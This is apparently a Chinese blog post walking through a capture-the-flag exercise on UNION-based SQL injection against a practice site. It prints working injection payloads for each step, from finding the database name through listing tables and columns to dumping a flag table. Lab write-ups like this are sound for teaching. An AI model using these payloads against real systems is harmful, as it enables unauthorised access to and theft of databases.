sql注入联合查询

简单联合注入例题及过程

1需要获取字段总数
2获取数据库
3获取数据库里面的表
4然后获取数据库里面表的字段  

例题地址 http://123.206.87.240:9001/sql/

 

sql注入联合查询

 

先判断有几列

sql注入联合查询

 

 

sql注入联合查询

 

由此可知有二列

 

获取数据库

1" union select 1,database() #

sql注入联合查询

 

获取表名

 

1" union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

补充:

Table_schema 数据表所属的数据库名
Table_name 表名称

获取列名

输入

1" union select concat(column_name),2 from information schema. columns where table_ name = "flag1"#

得到了列名: flagl

 

爆内容

 

 1" union select flag1,2 from flag1#

 

sql注入联合查询

 

相关文章:

  • 2021-09-18
  • 2021-09-21
  • 2021-11-15
  • 2021-12-10
  • 2021-10-02
  • 2021-12-10
  • 2021-08-07
  • 2020-07-12
猜你喜欢
  • 2021-11-07
  • 2021-12-10
  • 2021-12-10
  • 2021-12-10
  • 2018-04-22
  • 2019-01-16
  • 2021-09-13
  • 2021-11-15
相关资源
相似解决方案
热门标签
Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode